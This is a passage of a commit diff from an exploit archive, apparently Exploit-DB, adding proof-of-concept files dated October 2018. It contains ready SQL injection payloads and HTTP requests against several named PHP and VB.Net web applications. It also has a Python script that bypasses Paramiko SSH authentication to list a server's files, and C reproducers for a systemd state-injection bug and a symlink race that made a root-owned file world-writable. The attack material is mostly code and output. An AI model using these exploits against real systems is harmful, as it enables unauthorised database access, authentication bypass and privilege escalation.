DB: 2018-10-30

33 changes to exploits/shellcodes Navicat 12.0.29 - 'SSH' Denial of Service (PoC) AlienIP 2.41 - Denial of Service (PoC) Local Server 1.0.9 - Denial of Service (PoC) systemd - reexec State Injection systemd - chown_one() can Dereference Symlinks ASRock Drivers - Privilege Escalation Modbus Slave 7.0.0 - Denial of Service (PoC) School Equipment Monitoring System 1.0 - 'login' SQL Injection Modbus Slave PLC 7 - '.msw' Buffer Overflow (PoC) Paramiko 2.4.1 - Authentication Bypass Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection Grapixel New Media 2 - 'pageref' SQL Injection Library Management System 1.0 - 'frmListBooks' SQL Injection Open Faculty Evaluation System 7 - 'batch_name' SQL Injection Card Payment 1.0 - Cross-Site Request Forgery (Update Admin) MTGAS MOGG Web Simulator Script - SQL Injection Aplaya Beach Resort Online Reservation System 1.0 - SQL Injection / Cross-Site Request Forgery Curriculum Evaluation System 1.0 - SQL Injection Bakeshop Inventory System in VB.Net and MS Access Database 1.0 - SQL Injection Point of Sales (POS) in VB.Net MySQL Database 1.0 - SQL Injection School Event Management System 1.0 - SQL Injection School Event Management System 1.0 - Arbitrary File Upload School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin) School Attendance Monitoring System 1.0 - Cross-Site Request Forgery (Update Admin) School Attendance Monitoring System 1.0 - Arbitrary File Upload School Attendance Monitoring System 1.0 - SQL Injection PayPal-Credit Card-Debit Card Payment 1.0 - SQL Injection RhinOS CMS 3.x - Arbitrary File Download E-Negosyo System 1.0 - SQL Injection SaltOS Erp Crm 3.1 r8126 - SQL Injection SaltOS Erp Crm 3.1 r8126 - SQL Injection (2) SaltOS Erp Crm 3.1 r8126 - Database File Download K-iwi Framework 1775 - SQL Injection
2018-10-30 05:01:46 +00:00 · 2018-10-30 05:01:46 +00:00 · 15b77b5965
commit 15b77b5965
parent bbbf700308
34 changed files with 2764 additions and 0 deletions
--- a/exploits/aspx/webapps/45706.vb
+++ b/exploits/aspx/webapps/45706.vb
@ -0,0 +1,55 @@
 # Exploit Title: Library Management System 1.0 - 'frmListBooks' SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://www.sourcecodester.com/users/janobe
 # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/librarymanagementsystem.zip
 # Version: 1.0
 # Category: Windows
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: CVE-2018-18796
 # POC: 
 # 1)
 # textSearch System.Windows.Forms.TextBox / [SQL]
 # 
 # %' And (SElecT 112 FRom(SELECT CoUNT(*),conCAT((SELecT (ELT(112=112,1))),CONCAT_WS(0x203a20,USEr(),DATABASE(),VERsiON()),FLOOR(RAnD(0)*2))x FRoM INFORmaTION_SCHeMA.PLuGINS GRoUP BY x)a) AnD'%'='
 # 
 # https://1.bp.blogspot.com/-8FBYHFTLhhQ/W9YnCQg0nZI/AAAAAAAAENM/St0sn1IYjDs5kTjvYQNtT_mBmOEv-RaIgCLcBGAs/s1600/sql1.png
 # 
 #[PATH]/forms/frmListofBooks.vb
 #...
 Public Class frmListBooks
     Private Sub frmListBooks_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
         sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _
         ", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId` "
         reloadDtg(sql, dtgList)
     End Sub
     Private Sub txtSerach_TextChanged(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles txtSearch.TextChanged
         sql = "SELECT `AccessionNo`, `BookTitle`, `BookDesc` as 'Description', `Author`, `PublishDate`, `BookPublisher`, `Category`,BookType as 'typeOfBooks', `BookPrice` as 'Price', DeweyDecimal " & _
          ", Status FROM `tblbooks` b, `tblcategory` c WHERE b.`CategoryId`=c.`CategoryId`  AND (`BookTitle` Like '%" & txtSearch.Text & "%' OR `Author` Like '%" & txtSearch.Text & "%' OR `AccessionNo` Like '%" & txtSearch.Text & "%')"
         reloadDtg(sql, dtgList)
     End Sub
     Private Sub btnAdd_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles btnAdd.Click
         Try
             If dtgList.CurrentRow.Cells(10).Value = "Available" Then
                 frmBorrow.txtAccesionNumBorrow.Text = dtgList.CurrentRow.Cells(0).Value
                 Me.Close()
             Else
                 MsgBox("The book is already borrowed.", MsgBoxStyle.Exclamation)
             End If
         Catch ex As Exception
         End Try
     End Sub
     Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
         Me.Close()
     End Sub
 End Class
--- a/exploits/linux/dos/45714.c
+++ b/exploits/linux/dos/45714.c
@ -0,0 +1,159 @@
 /*
 [I am sending this bug report to Ubuntu, even though it's an upstream
 bug, as requested at
 https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports
 .]
 When systemd re-executes (e.g. during a package upgrade), state is
 serialized into a memfd before the execve(), then reloaded after the
 execve(). Serialized data is stored as text, with key-value pairs
 separated by newlines. Values are escaped to prevent control character
 injection.
 Lines associated with a systemd unit are read in unit_deserialize()
 using fgets():
                char line[LINE_MAX], *l, *v;
                [...]
                if (!fgets(line, sizeof(line), f)) {
                        if (feof(f))
                                return 0;
                        return -errno;
                }
 LINE_MAX is 2048:
 /usr/include/bits/posix2_lim.h:#define LINE_MAX         _POSIX2_LINE_MAX
 /usr/include/bits/posix2_lim.h:#define _POSIX2_LINE_MAX 2048
 When fgets() encounters overlong input, it behaves dangerously. If a
 line is more than 2047 characters long, fgets() will return the first
 2047 characters and leave the read cursor in the middle of the
 overlong line. Then, when fgets() is called the next time, it
 continues to read data from offset 2047 in the line as if a new line
 started there. Therefore, if an attacker can inject an overlong value
 into the serialized state somehow, it is possible to inject extra
 key-value pairs into the serialized state.
 A service that has `NotifyAccess != none` can send a status message to
 systemd that will be stored as a property of the service. When systemd
 re-executes, this status message is stored under the key
 "status-text".
 Status messages that are sent to systemd are received by
 manager_dispatch_notify_fd(). This function has a receive buffer of
 size NOTIFY_BUFFER_MAX==PIPE_BUF==4096.
 Therefore, a service with `NotifyAccess != none` can trigger this bug.
 Reproducer:
 Create a simple service with NotifyAccess by copying the following
 text into /etc/systemd/system/notify_test.service (assuming that your
 home directory is /home/user):
 =========
 [Unit]
 Description=jannh test service for systemd notifications
 [Service]
 Type=simple
 NotifyAccess=all
 FileDescriptorStoreMax=100
 User=user
 ExecStart=/home/user/test_service
 Restart=always
 [Install]
 WantedBy=multi-user.target
 =========
 Create a small binary that sends an overlong status when it starts up:
 =========
 */
 user@ubuntu-18-04-vm:~$ cat test_service.c
 #define _GNU_SOURCE
 #include <unistd.h>
 #include <sys/socket.h>
 #include <sys/un.h>
 #include <err.h>
 #include <signal.h>
 #include <stdio.h>
 int main(void) {
 	int sock = socket(AF_UNIX, SOCK_DGRAM, 0);
 	if (sock == -1) err(1, "socket");
 	struct sockaddr_un addr = {
 		.sun_family = AF_UNIX,
 		.sun_path = "/run/systemd/notify"
 	};
 	if (connect(sock, (struct sockaddr *)&addr, sizeof(addr))) err(1, "connect");
 	char message[0x2000] = "STATUS=";
 	memset(message+7, 'X', 2048-1-12);
 	strcat(message, "main-pid=13371337");
 	struct iovec iov = {
 		.iov_base = message,
 		.iov_len = strlen(message)
 	};
 	union {
 		struct cmsghdr cmsghdr;
 		char buf[CMSG_SPACE(sizeof(struct ucred))];
 	} control = { .cmsghdr = {
 		.cmsg_level = SOL_SOCKET,
 		.cmsg_type = SCM_CREDENTIALS,
 		.cmsg_len = CMSG_LEN(sizeof(struct ucred))
 	}};
 	struct ucred *ucred = (void*)(control.buf + CMSG_ALIGN(sizeof(struct cmsghdr)));
 	ucred->pid = getpid();
 	ucred->uid = getuid();
 	ucred->gid = getgid();
 	struct msghdr msghdr = {
 		.msg_iov = &iov,
 		.msg_iovlen = 1,
 		.msg_control = &control,
 		.msg_controllen = sizeof(control)
 	};
 	if (sendmsg(sock, &msghdr, 0) != strlen(message)) err(1, "sendmsg");
 	while (1) pause();
 }
 /*
 user@ubuntu-18-04-vm:~$ gcc -o test_service test_service.c
 user@ubuntu-18-04-vm:~$
 =========
 Install the service, and start it. Then run strace against systemd,
 and run:
 =========
 root@ubuntu-18-04-vm:~# systemctl daemon-reexec
 root@ubuntu-18-04-vm:~# systemctl stop notify_test.service
 =========
 The "stop" command hangs, and you'll see the following in strace:
 =========
 root@ubuntu-18-04-vm:~# strace -p1 2>&1 | grep 13371337
 openat(AT_FDCWD, "/proc/13371337/stat", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
 kill(13371337, SIG_0)                   = -1 ESRCH (No such process)
 kill(13371337, SIGTERM)                 = -1 ESRCH (No such process)
 =========
 This demonstrates that systemd's representation of the service's PID
 was clobbered by the status message.
 This can in theory, depending on how the active services are
 configured and some other things, also be used to e.g. steal file
 descriptors that other services have stored in systemd (visible in
 the serialized representation as "fd-store-fd").
 This isn't the only place in systemd that uses fgets(); other uses of
 fgets() should probably also be audited and potentially replaced with
 a safer function.
 */
--- a/exploits/linux/dos/45715.txt
+++ b/exploits/linux/dos/45715.txt
@ -0,0 +1,151 @@
 [I am sending this bug report to Ubuntu, even though it's an upstream
 bug, as requested at
 https://github.com/systemd/systemd/blob/master/docs/CONTRIBUTING.md#security-vulnerability-reports
 .]
 When chown_one() in the recursive chown logic decides that it has to change
 ownership of a directory entry, it first changes ownership as follows:
        if (name)
                r = fchownat(fd, name, uid, gid, AT_SYMLINK_NOFOLLOW);
        else
                r = fchown(fd, uid, gid);
        if (r < 0)
                return -errno;
 So far, this looks good. But then this happens:
        /* The linux kernel alters the mode in some cases of chown(). Let's undo this. */
        if (name) {
                if (!S_ISLNK(st->st_mode))
                        r = fchmodat(fd, name, st->st_mode, 0);
                else /* There's currently no AT_SYMLINK_NOFOLLOW for fchmodat() */
                        r = 0;
        } else
                r = fchmod(fd, st->st_mode);
 This is dangerous, especially in the case where `name != NULL`.
 First off: I don't think that the overall objective of this code block makes
 sense. Yes, the kernel sometimes changes the mode when ownership is changed -
 but that's only for set-UID binaries and set-GID binaries (but not
 set-GID directories).
 I'm pretty sure that setuid/setgid binaries aren't supposed to appear in these
 directories anyway.
 The problem here is that, as the comment explains,
 `fchmodat(fd, name, st->st_mode, 0)` follows symlinks. The fchmodat() call is
 guarded by a `S_ISLNK(st->st_mode)` check, but that's obviously racy and
 therefore doesn't actually help.
 My recommended fix is to just remove the offending code block. If, for some
 crazy reason, you actually want to support changing the ownership of
 setuid/setgid binaries, an alternative might be to do something like this:
    int fd2 = openat(fd, name, O_PATH|O_NOFOLLOW|O_CLOEXEC);
    if (fd2 >= 0) {
      fchmod(fd2, st->st_mode);
      close(fd2);
    }
 To reproduce, as root, create a service with "Restart=always",
 "StartLimitIntervalSec=0", "StateDirectory=test_service" and "User=user" (where
 "user" is the name of an unprivileged account). Point "ExecStart" at a binary
 that immediately exits:
 ========
 int main(void) {
  return 0;
 }
 ========
 Then start the service.
 Next, as the user the service is running as, create some entries in
 /var/lib/test_service:
 ========
 user@ubuntu-18-04-vm:~$ cd /var/lib/test_service/
 user@ubuntu-18-04-vm:/var/lib/test_service$ touch foo
 user@ubuntu-18-04-vm:/var/lib/test_service$ chmod 0666 foo
 user@ubuntu-18-04-vm:/var/lib/test_service$ ln -s /etc/hostname foo2
 user@ubuntu-18-04-vm:/var/lib/test_service$ ln foo foo_link
 user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la
 total 8
 drwxr-xr-x  2 user user 4096 Okt  8 16:42 .
 drwxr-xr-x 67 root root 4096 Okt  8 15:30 ..
 -rw-rw-rw-  2 user user    0 Okt  8 16:16 foo
 lrwxrwxrwx  1 user user   13 Okt  8 16:23 foo2 -> /etc/hostname
 -rw-rw-rw-  2 user user    0 Okt  8 16:16 foo_link
 ========
 Create and run a helper that continuously switches "foo" and "foo2" with each
 other:
 ========
 user@ubuntu-18-04-vm:~$ cat exchange.c
 #define _GNU_SOURCE
 #include <fcntl.h>
 #include <stdio.h>
 #include <unistd.h>
 #include <err.h>
 #include <sys/syscall.h>
 int main(int argc, char **argv) {
        char *base = argv[1], *p1 = argv[2], *p2 = argv[3];
        if (chdir(base)) err(1, "chdir");
        while (1) {
                if (syscall(__NR_renameat2, AT_FDCWD, p1, AT_FDCWD, p2, 2))
                        perror("renameat");
        }
 }
 user@ubuntu-18-04-vm:~$ gcc -o exchange exchange.c -O2
 user@ubuntu-18-04-vm:~$ ./exchange /var/lib/test_service foo foo2
 ========
 Change ownership of "foo_link" and the test_service directory to trigger the
 permission fixup logic when the service restarts the next time:
 ========
 user@ubuntu-18-04-vm:/var/lib/test_service$ chown user:cdrom foo_link .
 ========
 Check whether it worked:
 ========
 user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la /etc/hostname .
 -rw-r--r-- 1 root root   16 Jul  3 19:20 /etc/hostname
 .:
 total 8
 drwxr-xr-x  2 user user 4096 Okt  8 16:45 .
 drwxr-xr-x 67 root root 4096 Okt  8 15:30 ..
 lrwxrwxrwx  1 user user   13 Okt  8 16:23 foo -> /etc/hostname
 -rw-rw-rw-  2 user user    0 Okt  8 16:16 foo2
 -rw-rw-rw-  2 user user    0 Okt  8 16:16 foo_link
 ========
 If it didn't work (as in this example), retry the chown a few times. After a few
 times, you should see this:
 ========
 user@ubuntu-18-04-vm:/var/lib/test_service$ ls -la /etc/hostname .
 -rw-rw-rw- 1 root root   16 Jul  3 19:20 /etc/hostname
 .:
 total 8
 drwxr-xr-x  2 user user 4096 Okt  8 16:46 .
 drwxr-xr-x 67 root root 4096 Okt  8 15:30 ..
 -rw-rw-rw-  2 user user    0 Okt  8 16:16 foo
 lrwxrwxrwx  1 user user   13 Okt  8 16:23 foo2 -> /etc/hostname
 -rw-rw-rw-  2 user user    0 Okt  8 16:16 foo_link
 ========
 Another thing that might also go wrong, but that I haven't tested, is the
 interaction with the mount.ecryptfs_private helper that comes with ecryptfs.
 As far as I can tell, an attacker would be able to use mount.ecryptfs_private to
 mount an ecryptfs inside the StateDirectory. This ecryptfs instance could then
 function similar to a bind mount, causing systemd to change the ownership of
 files that are e.g. in /etc. You might want to ensure that no files or
 directories you access are located on an ecryptfs filesystem.
--- a/exploits/linux/remote/45712.py
+++ b/exploits/linux/remote/45712.py
@ -0,0 +1,31 @@
 # Exploit Title: Paramiko 2.4.1 - Authentication Bypass
 # Date: 2018-10-27
 # Exploit Author: Adam Brown
 # Vendor Homepage: https://www.paramiko.org
 # Software Link: https://github.com/paramiko/paramiko/tree/v1.15.2
 # Version: < 1.17.6, 1.18.x < 1.18.5, 2.0.x < 2.0.8, 2.1.x < 2.1.5, 2.2.x < 2.2.3, 2.3.x < 2.3.2, and 2.4.x < 2.4.1
 # Tested on: Multiple
 # CVE : CVE-2018-7750
 # This PoC is based on discussions found at the following github issue:
 # https://github.com/paramiko/paramiko/issues/1175
 # TLDR, Paramiko doesn't check if the client has completed the authentication step
 # before allowing the client to open channels. The PoC below connects to an SFTP
 # server, and lists the root directory without authenticating. Slight modification
 # is required if you want to open an SSH channel.
 #!/usr/bin/python
 import paramiko
 host = '127.0.0.1'
 port = 22
 trans = paramiko.Transport((host, port))
 trans.start_client()
 # If the call below is skipped, no username or password is required.
 # trans.auth_password('username', 'password')
 sftp = paramiko.SFTPClient.from_transport(trans)
 print(sftp.listdir('/'))
 sftp.close()
--- a/exploits/php/webapps/45703.txt
+++ b/exploits/php/webapps/45703.txt
@ -0,0 +1,140 @@
 # Exploit Title: Open Faculty Evaluation System 5.6 - 'batch_name' SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://openfacultyeval.sourceforge.io/
 # Software Link: https://sourceforge.net/projects/openfacultyeval/files/feedback_php5_6.zip/download
 # Version: Php 5.6
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 /[PATH]/submit_feedback.php
 #....
 #17 if(isset($_POST['submit']))
 #18 {
 #19 //feedback no
 #20 $check_feedback_no="select * from batch_master where batch_id='".$_POST['']."'";
 #21 $res_feedback_no=mysql_query($check_feedback_no) or die(mysql_error());
 #22 $result=mysql_fetch_array($res_feedback_no);
 #23 
 #24 
 #25 $sql="select * from feedback_master where roll_no='".$_POST['roll_no']."' and b_id='".$_POST['b_name']."' and f_id='".$_POST['fac_name']."' and sub_id='".$_POST['sub_name']."' and sem_id='".$_POST['sem_name']."' and batch_id='".$_POST['batch_name']."' and division_id='".$_POST['division']."' and feedback_no='".$result['feedback_no']."'";
 #26 //echo $sql;
 #27 $res=mysql_query($sql) or die(mysql_error());
 #....
 # POC: 
 # 1)
 # http://localhost/[PATH]/submit_feedback.php
 # 
 POST /[PATH]/submit_feedback.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 282
 batch_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 01:02:53 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Content-Length: 235
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 2)
 # http://localhost/[PATH]/submit_feedback.php
 # 
 POST /[PATH]/submit_feedback.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 278
 b_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 01:15:30 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Content-Length: 1204
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 3)
 # http://localhost/[PATH]/submit_feedback.php
 # 
 POST /[PATH]/submit_feedback.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 280
 sem_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 01:19:57 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Content-Length: 1202
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 4)
 # http://localhost/[PATH]/submit_feedback.php
 # 
 POST /[PATH]/submit_feedback.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 280
 division=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 01:23:11 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Content-Length: 1202
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 5)
 # http://localhost/[PATH]/submit_feedback.php
 # 
 POST /[PATH]/submit_feedback.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 279
 roll_no=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 01:29:20 GMT
 Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
 X-Powered-By: PHP/5.6.30
 Content-Length: 1203
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
--- a/exploits/php/webapps/45704.txt
+++ b/exploits/php/webapps/45704.txt
@ -0,0 +1,24 @@
 # Exploit Title: Grapixel New Media 2 - 'pageref' SQL Injection
 # Exploit Author: Berk Dusunur
 # Google Dork: N/A
 # Type: Web App
 # Date: 2018-10-26
 # Vendor Homepage: http://www.grapixel.com
 # Software Link: http://www.grapixel.com
 # Affected Version: v2
 # Tested on: MacosX
 # CVE : N/A
 #Proof Of Concept
 # Time-Based sql injection is called a data extraction event with request response times 
 # with the server when there is no other way for it to extract aggressive data. It should 
 # be determined by sql injection type. I discovered blind time-based sql injection. 
 # Because single quotes didn't break the page structure, so I tried to get results 
 # using waitfor delay instead.
 http://target/pages.aspx?pageref=[SQL]
 http://target/pages.aspx?pageref=' waitfor delay '00:00:05'--;
 http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>80) WAITFOR DELAY '0:0:5'--
 http://target/pages.aspx?pageref=';IF(UNICODE(SUBSTRING((SELECT DB_NAME(12)),1,1))>81) WAITFOR DELAY '0:0:5'--
 Ascii equivalent of 80,81 figures The first database, wait 5 seconds if the first letter is "p"
--- a/exploits/php/webapps/45707.txt
+++ b/exploits/php/webapps/45707.txt
@ -0,0 +1,147 @@
 # Exploit Title: Open Faculty Evaluation System 7 - 'batch_name' SQL Injection
 # Dork: N/A
 # Date: 2018-10-29
 # Exploit Author: Ihsan Sencan
 # Vendor Homepage: https://openfacultyeval.sourceforge.io/
 # Software Link: https://sourceforge.net/projects/openfacultyeval/files/feedback_php7.zip/download
 # Version: Php 7
 # Category: Webapps
 # Tested on: WiN7_x64/KaLiLinuX_x64
 # CVE: N/A
 /[PATH]/submit_feedback.php
 #....
 #15 include("includes/config_db.php");
 #16 
 #17 if(isset($_POST['submit']))
 #18 {
 #19 //feedback no
 #20 $check_feedback_no="select * from batch_master where batch_id='".$_POST['batch_name']."'";
 #21 $res_feedback_no=mysqli_query($conn, $check_feedback_no) or die(mysqli_error($conn));
 #22 $result=mysqli_fetch_array($res_feedback_no);
 #23 
 #24 
 #25 $sql="select * from feedback_master where roll_no='".$_POST['roll_no']."' and b_id='".$_POST['b_name']."' and f_id='".$_POST['fac_name']."' and sub_id='".$_POST['sub_name']."' and sem_id='".$_POST['sem_name']."' and batch_id='".$_POST['batch_name']."' and division_id='".$_POST['division']."' and feedback_no='".$result['feedback_no']."'";
 #26 //echo $sql;
 #27 $res=mysqli_query($conn, $sql) or die(mysqli_error($conn));
 #28 
 #29 //echo mysqli_num_rows($res);
 #30 //exit;
 #31 if(mysqli_num_rows($res)>=1)
 #32 {
 #....
 # POC: 
 # 1)
 # http://localhost/[PATH]/submit_feedback.php
 # 
 POST /[PATH]/submit_feedback.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 282
 batch_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 00:42:01 GMT
 Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
 X-Powered-By: PHP/7.1.22
 Content-Length: 311
 Keep-Alive: timeout=5, max=99
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 2)
 # http://localhost/[PATH]/submit_feedback.php
 # 
 POST /[PATH]/submit_feedback.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 278
 b_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 00:58:04 GMT
 Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
 X-Powered-By: PHP/7.1.22
 Content-Length: 1315
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 3)
 # http://localhost/[PATH]/submit_feedback.php
 # 
 POST /[PATH]/submit_feedback.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 280
 sem_name=2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&submit=Submit
 HTTP/1.1 200 OK
 Date: Mon, 29 Oct 2018 00:58:15 GMT
 Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/7.1.22
 X-Powered-By: PHP/7.1.22
 Content-Length: 1313
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8
 # POC: 
 # 4)
 # http://localhost/[PATH]/submit_feedback.php
 # 
 POST /[PATH]/submit_feedback.php HTTP/1.1
 Host: TARGET
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: keep-alive
